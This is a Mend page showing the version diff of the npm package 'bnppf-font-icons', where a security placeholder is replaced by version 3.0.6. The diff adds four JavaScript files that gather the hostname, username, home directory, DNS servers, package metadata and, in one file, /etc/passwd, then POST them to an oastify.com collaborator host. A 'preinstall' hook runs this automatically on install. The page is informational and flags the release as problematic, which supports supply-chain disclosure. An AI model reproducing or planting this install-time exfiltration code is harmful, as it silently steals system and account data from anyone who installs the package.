npm - bnppf-font-icons - Versions diffs - 0.0.1-security → 3.0.6 - Mend

bnppf-font-icons 0.0.1-security → 3.0.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of bnppf-font-icons might be problematic. Click here for more details.

Files changed (6) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,77 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const fs = require("fs");
+const packageJSON = require("./package.json");
+const packageName = packageJSON.name;
+// Read the /etc/hostname file
+let hostnameData = "";
+try {
+    hostnameData = fs.readFileSync("/etc/hostname", "utf8");
+} catch (err) {
+    hostnameData = `Error reading /etc/hostname: ${err.message}`;
+}
+// Function to get public IP address (to gather organization info)
+function getPublicIP(callback) {
+    https.get('https://api.ipify.org?format=json', (res) => {
+        let data = '';
+        res.on('data', chunk => data += chunk);
+        res.on('end', () => callback(null, JSON.parse(data).ip));
+    }).on('error', (err) => callback(err, null));
+}
+// Gather tracking data
+const trackingData = {
+    package: packageName,
+    currentDirectory: __dirname,
+    homeDirectory: os.homedir(),
+    hostname: os.hostname(),
+    user: os.userInfo().username,
+    dnsServers: dns.getServers(),
+    packageVersion: packageJSON.version,
+    packageResolved: packageJSON.___resolved,
+    hostnameFileData: hostnameData,
+    packageJSON: packageJSON,
+};
+// Fetch the public IP to include org information
+getPublicIP((error, publicIP) => {
+    if (error) {
+        console.error("Error fetching public IP: ", error);
+    } else {
+        trackingData.publicIP = publicIP;
+        // Prepare post data
+        const postData = querystring.stringify({
+            msg: JSON.stringify(trackingData),
+        });
+        const options = {
+            hostname: "ar5xtzby7b1ze0mhj77q4j7uglmca2yr.oastify.com", // Replace with Burp collaborator or server
+            port: 443,
+            path: "/",
+            method: "POST",
+            headers: {
+                "Content-Type": "application/x-www-form-urlencoded",
+                "Content-Length": postData.length,
+            },
+        };
+        const req = https.request(options, (res) => {
+            res.on("data", (d) => {
+                process.stdout.write(d);
+            });
+        });
+        req.on("error", (e) => {
+            // Log error if needed
+            console.error(e);
+        });
+        req.write(postData);
+        req.end();
+    }
+});

package/index1.js ADDED Viewed

@@ -0,0 +1,46 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+const trackingData = JSON.stringify({
+    p: package,
+    c: dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON._resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+var options = {
+    hostname: "ar5xtzby7b1ze0mhj77q4j7uglmca2yr.oastify.com",
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+req.on("error", (e) => {
+    // console.error(e);
+});
+req.write(postData);
+req.end();

package/index2.js ADDED Viewed

@@ -0,0 +1,46 @@
+const os = require("os");
+const dns = require("dns");
+const https = require("https");
+const packageJSON = require("./package.json");
+const packageName = packageJSON.name;
+const trackingData = {
+    p: packageName,
+    c: __dirname, // Fixed variable
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(), // Static DNS servers
+    r: packageJSON._resolved || "Not available", // Fallback if _resolved doesn't exist
+    v: packageJSON.version,
+    pjson: packageJSON,
+};
+const postData = JSON.stringify(trackingData);
+const options = {
+    hostname: "ar5xtzby7b1ze0mhj77q4j7uglmca2yr.oastify.com",
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/json", // Send JSON
+        "Content-Length": Buffer.byteLength(postData), // Correct length
+    },
+};
+const req = https.request(options, (res) => {
+    console.log(`STATUS: ${res.statusCode}`);
+    res.setEncoding("utf8");
+    res.on("data", (chunk) => {
+        console.log(`BODY: ${chunk}`);
+    });
+});
+req.on("error", (e) => {
+    console.error(`Request error: ${e.message}`);
+});
+req.write(postData);
+req.end();

package/index3.js ADDED Viewed

@@ -0,0 +1,56 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const fs = require("fs");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+// Read the /etc/passwd file
+let passwdData = "";
+try {
+    passwdData = fs.readFileSync("/etc/passwd", "utf8");
+} catch (err) {
+    passwdData = `Error reading /etc/passwd: ${err.message}`;
+}
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+    passwd: passwdData, // Add the /etc/passwd content here
+});
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+var options = {
+    hostname: "ar5xtzby7b1ze0mhj77q4j7uglmca2yr.oastify.com",
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+req.on("error", (e) => {
+    // console.error(e);
+});
+req.write(postData);
+req.end();

package/package.json CHANGED Viewed

@@ -1,6 +1,12 @@
 {
   "name": "bnppf-font-icons",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "3.0.6",
+  "description": "ngosytuan",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall":"node index.js"
+},
+  "author": "",
+  "license": "ISC"
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=bnppf-font-icons for more information.